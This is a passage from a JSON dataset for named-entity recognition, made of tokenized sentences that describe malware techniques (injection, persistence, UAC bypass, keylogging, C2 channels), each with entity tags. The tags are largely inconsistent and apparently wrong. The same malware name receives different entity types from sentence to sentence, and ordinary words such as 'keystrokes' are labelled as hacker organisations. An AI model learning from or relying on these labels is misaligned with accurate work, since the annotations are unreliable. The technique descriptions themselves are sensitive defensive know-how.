"the", "Bka.exe", "process", "using", "the", "`VirtualAllocEx`,", "`WriteProcessMemory`", "and", "`CreateRemoteThread`", "APIs", "to", "load", "the", "DLL", "component." ], "ner_tags": [ "O", "B-SamFile", "B-SamFile", "O", "O", "B-Features", "O", "O", "B-SamFile", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FunnyDream", "can", "Base64", "encode", "its", "C2", "address", "stored", "in", "a", "template", "binary", "with", "the", "`xyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvw_-`", "or", "`xyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvw_=`", "character", "sets." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "FunnyDream", "can", "execute", "commands,", "including", "gathering", "user", "information,", "and", "send", "the", "results", "to", "C2." ], "ner_tags": [ "B-Way", "O", "I-Features", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FunnyDream", "can", "delete", "files", "including", "its", "dropper", "component." ], "ner_tags": [ "B-Way", "O", "B-Features", "I-Features", "O", "O", "B-Way", "O" ] }, { "tokens": [ "FunnyDream", "can", "identify", "files", "with", ".doc,", ".docx,", ".ppt,", ".pptx,", ".xls,", ".xlsx,", "and", ".pdf", "extensions", "and", "specific", "timestamps", "for", "collection." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FunnyDream", "has", "the", "ability", "to", "clean", "traces", "of", "malware", "deployment." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "FunnyDream", "can", "download", "additional", "files", "onto", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "The", "FunnyDream", "Keyrecord", "component", "can", "capture", "keystrokes." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "FunnyDream", "can", "stage", "collected", "information", "including", "screen", "captures", "and", "logged", "keystrokes", "locally." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FunnyDream", "has", "used", "a", "service", "named", "`WSearch`", "for", "execution." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "FunnyDream", "can", "use", "Native", "API", "for", "defense", "evasion,", "discovery,", "and", "collection." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "I-Purp", "O", "B-Features", "O", "B-Features" ] }, { "tokens": [ "FunnyDream", "can", "communicate", "with", "C2", "over", "TCP", "and", "UDP." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "The", "FunnyDream", "FilepakMonitor", "component", "can", "detect", "removable", "drive", "insertion." ], "ner_tags": [ "O", "B-Way", "B-SecTeam", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FunnyDream", "has", "the", "ability", "to", "discover", "processes,", "including", "`Bka.exe`", "and", "`BkavUtil.exe`." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "FunnyDream", "can", "connect", "to", "HTTP", "proxies", "via", "TCP", "to", "create", "a", "tunnel", "to", "C2." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FunnyDream", "can", "identify", "and", "use", "configured", "proxies", "in", "a", "compromised", "network", "for", "C2", "communication." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "B-Way", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FunnyDream", "can", "check", "`Software\\Microsoft\\Windows\\CurrentVersion\\Internet", "Settings`", "to", "extract", "the", "`ProxyServer`", "string." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FunnyDream", "can", "use", "a", "Registry", "Run", "Key", "and", "the", "Startup", "folder", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "FunnyDream", "can", "collect", "information", "about", "hosts", "on", "the", "victim", "network." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FunnyDream", "can", "use", "`rundll32`", "for", "execution", "of", "its", "components." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "FunnyDream", "ScreenCap", "component", "can", "take", "screenshots", "on", "a", "compromised", "host." ], "ner_tags": [ "O", "B-Way", "B-SecTeam", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "FunnyDream", "can", "identify", "the", "processes", "for", "Bkav", "antivirus." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "FunnyDream", "can", "enumerate", "all", "logical", "drives", "on", "a", "targeted", "machine." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FunnyDream", "can", "parse", "the", "`ProxyServer`", "string", "in", "the", "Registry", "to", "discover", "http", "proxies." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FunnyDream", "has", "the", "ability", "to", "gather", "user", "information", "from", "the", "targeted", "system", "using", "`whoami/upn&whoami/fqdn&whoami/logonid&whoami/all`." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "FunnyDream", "can", "check", "system", "time", "to", "help", "determine", "when", "changes", "were", "made", "to", "specified", "files." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FunnyDream", "can", "use", "`cmd.exe`", "for", "execution", "on", "remote", "hosts." ], "ner_tags": [ "B-Way", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FunnyDream", "can", "use", "WMI", "to", "open", "a", "Windows", "command", "shell", "on", "a", "remote", "machine." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FunnyDream", "has", "established", "persistence", "by", "running", "`sc.exe`", "and", "by", "setting", "the", "`WSearch`", "service", "to", "run", "automatically." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Fysbis", "has", "been", "encrypted", "using", "XOR", "and", "RC4." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Fysbis", "has", "the", "ability", "to", "delete", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "Fysbis", "has", "the", "ability", "to", "search", "for", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Fysbis", "can", "perform", "keylogging." ], "ner_tags": [ "B-Idus", "O", "O", "O" ] }, { "tokens": [ "Fysbis", "has", "masqueraded", "as", "the", "rsyncd", "and", "dbus-inotifier", "services." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Fysbis", "has", "masqueraded", "as", "trusted", "software", "rsyncd", "and", "dbus-inotifier." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Fysbis", "can", "collect", "information", "about", "running", "processes." ], "ner_tags": [ "B-Idus", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Fysbis", "can", "use", "Base64", "to", "encode", "its", "C2", "traffic." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Fysbis", "has", "used", "the", "command", "<code>ls", "/etc", "|", "egrep", "-e\"fedora\\*|debian\\*|gentoo\\*|mandriva\\*|mandrake\\*|meego\\*|redhat\\*|lsb-\\*|sun-\\*|SUSE\\*|release\"</code>", "to", "determine", "which", "Linux", "OS", "version", "is", "running." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Fysbis", "has", "established", "persistence", "using", "a", "systemd", "service." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Fysbis", "has", "the", "ability", "to", "create", "and", "execute", "commands", "in", "a", "remote", "shell", "for", "CLI." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "If", "executing", "without", "root", "privileges,", "Fysbis", "adds", "a", "`.desktop`", "configuration", "file", "to", "the", "user's", "`~/.config/autostart`", "directory." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "GLASSTOKEN", "has", "the", "ability", "to", "decode", "hexadecimal", "and", "Base64", "C2", "requests." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GLASSTOKEN", "can", "use", "PowerShell", "for", "command", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "GLASSTOKEN", "has", "hexadecimal", "and", "Base64", "encoded", "C2", "content." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GLASSTOKEN", "is", "a", "web", "shell", "capable", "of", "tunneling", "C2", "connections", "and", "code", "execution", "on", "compromised", "Ivanti", "Secure", "Connect", "VPNs." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GLOOXMAIL", "communicates", "to", "servers", "operated", "by", "Google", "using", "the", "Jabber/XMPP", "protocol." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Org", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "GRIFFON", "has", "used", "a", "reconnaissance", "module", "that", "can", "be", "used", "to", "retrieve", "Windows", "domain", "membership", "information." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GRIFFON", "is", "written", "in", "and", "executed", "as", "JavaScript." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GRIFFON", "has", "used", "PowerShell", "to", "execute", "the", "Meterpreter", "downloader", "TinyMet." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "B-Way", "I-Tool", "O" ] }, { "tokens": [ "GRIFFON", "has", "used", "a", "persistence", "module", "that", "stores", "the", "implant", "inside", "the", "Registry,", "which", "executes", "at", "logon." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GRIFFON", "has", "used", "<code>sctasks</code>", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GRIFFON", "has", "used", "a", "screenshot", "module", "that", "can", "be", "used", "to", "take", "a", "screenshot", "of", "the", "remote", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "GRIFFON", "has", "used", "a", "reconnaissance", "module", "that", "can", "be", "used", "to", "retrieve", "information", "about", "a", "victim's", "computer,", "including", "the", "resolution", "of", "the", "workstation", "." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GRIFFON", "has", "used", "a", "reconnaissance", "module", "that", "can", "be", "used", "to", "retrieve", "the", "date", "and", "time", "of", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gazer", "uses", "custom", "encryption", "for", "C2", "that", "uses", "RSA." ], "ner_tags": [ "B-Way", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Gazer", "versions", "are", "signed", "with", "various", "valid", "certificates;", "one", "was", "likely", "faked", "and", "issued", "by", "Comodo", "for", "\"Solid", "Loop", "Ltd,\"", "and", "another", "was", "issued", "for", "\"Ultimate", "Computer", "Support", "Ltd.\"" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Time", "O", "B-HackOrg", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gazer", "logs", "its", "actions", "into", "files", "that", "are", "encrypted", "with", "3DES.", "It", "also", "uses", "RSA", "to", "encrypt", "resources." ], "ner_tags": [ "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Gazer", "has", "commands", "to", "delete", "files", "and", "persistence", "mechanisms", "from", "the", "victim." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gazer", "can", "execute", "a", "task", "to", "download", "a", "file." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gazer", "stores", "configuration", "items", "in", "alternate", "data", "streams", "(ADSs)", "if", "the", "Registry", "is", "not", "accessible." ], "ner_tags": [ "B-Idus", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gazer", "injects", "its", "communication", "module", "into", "an", "Internet", "accessible", "process", "through", "which", "it", "performs", "C2." ], "ner_tags": [ "B-Way", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gazer", "can", "establish", "persistence", "by", "creating", "a", ".lnk", "file", "in", "the", "Start", "menu." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Gazer", "can", "establish", "persistence", "by", "creating", "a", "scheduled", "task." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gazer", "can", "establish", "persistence", "through", "the", "system", "screensaver", "by", "configuring", "it", "to", "execute", "the", "malware." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gazer", "can", "establish", "persistence", "by", "creating", "a", ".lnk", "file", "in", "the", "Start", "menu", "or", "by", "modifying", "existing", ".lnk", "files", "to", "execute", "the", "malware", "through", "cmd.exe." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Gazer", "uses", "custom", "encryption", "for", "C2", "that", "uses", "3DES." ], "ner_tags": [ "B-Idus", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Gazer", "obtains", "the", "current", "user's", "security", "identifier." ], "ner_tags": [ "B-Way", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gazer", "performs", "thread", "execution", "hijacking", "to", "inject", "its", "orchestrator", "into", "a", "running", "thread", "from", "a", "remote", "process." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "early", "Gazer", "versions,", "the", "compilation", "timestamp", "was", "faked." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gazer", "communicates", "with", "its", "C2", "servers", "over", "HTTP." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Gazer", "can", "establish", "persistence", "by", "setting", "the", "value", "“Shell”", "with", "“explorer.exe,", "%malware_pathfile%”", "under", "the", "Registry", "key", "<code>HKCU\\Software\\Microsoft\\Windows", "NT\\CurrentVersion\\Winlogon</code>." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Gelsemium", "can", "use", "token", "manipulation", "to", "bypass", "UAC", "on", "Windows7", "systems." ], "ner_tags": [ "B-Idus", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gelsemium", "can", "use", "junk", "code", "to", "hide", "functions", "and", "evade", "detection." ], "ner_tags": [ "B-Idus", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Gelsemium", "can", "bypass", "UAC", "to", "elevate", "process", "privileges", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gelsemium", "can", "use", "the", "`IARPUinstallerStringLauncher`", "COM", "interface", "are", "part", "of", "its", "UAC", "bypass", "process." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gelsemium", "has", "the", "ability", "to", "use", "DNS", "in", "communication", "with", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Gelsemium", "can", "collect", "data", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gelsemium", "can", "decompress", "and", "decrypt", "DLLs", "and", "shellcode." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Features", "B-HackOrg", "O", "O" ] }, { "tokens": [ "Gelsemium", "can", "use", "dynamic", "DNS", "domain", "names", "in", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "I-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gelsemium", "has", "the", "ability", "to", "inject", "DLLs", "into", "specific", "processes." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "Gelsemium", "has", "the", "ability", "to", "compress", "its", "components." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gelsemium", "can", "use", "multiple", "domains", "and", "protocols", "in", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gelsemium", "can", "delete", "its", "dropper", "component", "from", "the", "targeted", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gelsemium", "can", "retrieve", "data", "from", "specific", "Windows", "directories,", "as", "well", "as", "open", "random", "files", "as", "part", "of", "Virtualization/Sandbox", "Evasion." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "B-Way", "B-HackOrg" ] }, { "tokens": [ "Gelsemium", "can", "store", "its", "components", "in", "the", "Registry." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gelsemium", "can", "download", "additional", "plug-ins", "to", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Gelsemium", "has", "used", "unverified", "signatures", "on", "malicious", "DLLs." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gelsemium", "has", "named", "malicious", "binaries", "`serv.exe`,", "`winprint.dll`,", "and", "`chrome_elf.dll`", "and", "has", "set", "its", "persistence", "in", "the", "Registry", "with", "the", "key", "value", "<code>Chrome", "Update</code>", "to", "appear", "legitimate." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SecTeam", "O", "O", "O" ] }, { "tokens": [ "Gelsemium", "can", "modify", "the", "Registry", "to", "store", "its", "components." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gelsemium", "has", "the", "ability", "to", "use", "various", "Windows", "API", "functions", "to", "perform", "tasks." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Features", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Gelsemium", "has", "the", "ability", "to", "use", "TCP", "and", "UDP", "in", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Gelsemium", "can", "drop", "itself", "in", "<code>C:\\Windows\\System32\\spool\\prtprocs\\x64\\winprint.dll</code>", "to", "be", "loaded", "automatically", "by", "the", "spoolsv", "Windows", "service." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gelsemium", "can", "enumerate", "running", "processes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O" ] }, { "tokens": [ "Gelsemium", "can", "open", "random", "files", "and", "Registry", "keys", "to", "obscure", "malware", "behavior", "from", "sandbox", "analysis." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gelsemium", "can", "use", "custom", "shellcode", "to", "map", "embedded", "DLLs", "into", "memory." ], "ner_tags": [ "B-SamFile", "O", "O", "I-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gelsemium", "can", "set", "persistence", "with", "a", "Registry", "run", "key." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gelsemium", "can", "check", "for", "the", "presence", "of", "specific", "security", "products." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gelsemium", "can", "determine", "the", "operating", "system", "and", "whether", "a", "targeted", "machine", "has", "a", "32", "or", "64", "bit", "architecture." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gelsemium", "has", "the", "ability", "to", "distinguish", "between", "a", "standard", "user", "and", "an", "administrator", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gelsemium", "has", "the", "ability", "to", "perform", "timestomping", "of", "files", "on", "targeted", "systems." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "Gelsemium", "can", "use", "junk", "code", "to", "generate", "random", "activity", "to", "obscure", "malware", "behavior." ], "ner_tags": [ "B-Idus", "O", "O", "B-Tool", "O", "O", "O", "O", "B-OffAct", "O", "O", "O", "O" ] }, { "tokens": [ "Gelsemium", "can", "use", "HTTP/S", "in", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Gelsemium", "can", "use", "a", "batch", "script", "to", "delete", "itself." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Tool", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Gelsemium", "can", "drop", "itself", "in", "`C:\\Windows\\System32\\spool\\prtprocs\\x64\\winprint.dll`", "as", "an", "alternative", "Print", "Processor", "to", "be", "loaded", "automatically", "when", "the", "spoolsv", "Windows", "service", "starts." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GeminiDuke", "collects", "information", "from", "the", "victim,", "including", "installed", "drivers,", "programs", "previously", "executed", "by", "users,", "programs", "and", "services", "configured", "to", "automatically", "run", "at", "startup,", "files", "and", "folders", "present", "in", "any", "user's", "home", "folder,", "files", "and", "folders", "present", "in", "any", "user's", "My", "Documents,", "programs", "installed", "to", "the", "Program", "Files", "folder,", "and", "recently", "accessed", "files,", "folders,", "and", "programs." ], "ner_tags": [ "B-Way", "I-Features", "I-Features", "O", "O", "O", "O", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GeminiDuke", "collects", "information", "on", "local", "user", "accounts", "from", "the", "victim." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GeminiDuke", "collects", "information", "on", "running", "processes", "and", "environment", "variables", "from", "the", "victim." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GeminiDuke", "collects", "information", "on", "network", "settings", "and", "Internet", "proxy", "settings", "from", "the", "victim." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GeminiDuke", "collects", "information", "on", "programs", "and", "services", "on", "the", "victim", "that", "are", "configured", "to", "automatically", "run", "at", "startup." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "GeminiDuke", "uses", "HTTP", "and", "HTTPS", "for", "command", "and", "control." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Get2", "has", "the", "ability", "to", "run", "executables", "with", "command-line", "arguments." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "Get2", "has", "the", "ability", "to", "inject", "DLLs", "into", "processes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "B-Way", "O", "O" ] }, { "tokens": [ "Get2", "has", "the", "ability", "to", "identify", "running", "processes", "on", "an", "infected", "host." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Get2", "has", "the", "ability", "to", "identify", "the", "computer", "name", "and", "Windows", "version", "of", "an", "infected", "host." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Get2", "has", "the", "ability", "to", "identify", "the", "current", "username", "of", "an", "infected", "host." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Get2", "has", "the", "ability", "to", "use", "HTTP", "to", "send", "information", "collected", "from", "an", "infected", "host", "to", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gold", "Dragon", "encrypts", "data", "using", "Base64", "before", "being", "sent", "to", "the", "command", "and", "control", "server." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gold", "Dragon", "terminates", "anti-malware", "processes", "if", "they’re", "found", "running", "on", "the", "system." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gold", "Dragon", "deletes", "one", "of", "its", "files,", "2.hwp,", "from", "the", "endpoint", "after", "establishing", "persistence." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Gold", "Dragon", "lists", "the", "directories", "for", "Desktop,", 